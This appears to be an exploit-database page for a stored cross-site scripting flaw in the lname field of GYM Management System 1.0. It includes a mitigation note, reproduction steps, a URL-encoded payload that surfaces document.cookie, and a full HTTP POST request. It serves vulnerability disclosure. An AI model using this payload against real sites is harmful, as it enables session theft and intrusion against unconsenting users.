header-logo
Suggest Exploit
vendor:
GYM Management System
by:
Alperen Yozgat
6.1
CVSS
HIGH
Cross Site Scripting (XSS)
79
CWE
Product Name: GYM Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:phpgurukul:gym_management_system:1.0
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30
2023

Cross Site Scripting (Stored) in GYM Management System

The GYM Management System version 1.0 is vulnerable to stored cross-site scripting (XSS) due to insufficient validation of user-supplied data in the 'lname' field of the profile.php page. An attacker can inject a malicious payload, such as x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22, which will be executed whenever a user accesses the profile.php page, leading to the execution of arbitrary scripts in the context of the user's browser. This vulnerability has been detected by Alperen Yozgat.

Mitigation:

To mitigate this vulnerability, input validation and output encoding should be implemented to sanitize user-supplied data before rendering it on web pages. Additionally, developers should consider implementing Content Security Policy (CSP) headers to mitigate the impact of XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored)
# Date: 29/09/2023
# Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip
# Version: 1.0
# Last Update: 31 August 2022
# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30

# 1: Create user, login and go to profile.php

# 2: Use payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 in lname field.

# 3: When entering the profile.php page, document.cookie will be reflected every time.

# Author
This vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner.

# About Rapplex
Rapplex is a web applicaton security scanner that scans and reports vulnerabilities in websites.
Pentesters can use it as an automation tool for daily tasks but "Pentester Studio" will provide such a great addition as well in their manual assessments.
So, the software does not need separate development tools to discover different types of vulnerabilities or to develop existing engines. 
"Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection, Fle Incluson.


# HTTP Request 

POST /gym/profile.php HTTP/1.1
Host: localhost
Content-Length: 129
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGE
Connection: close

fname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update

Navigation

Suggest Exploit

Services By CQR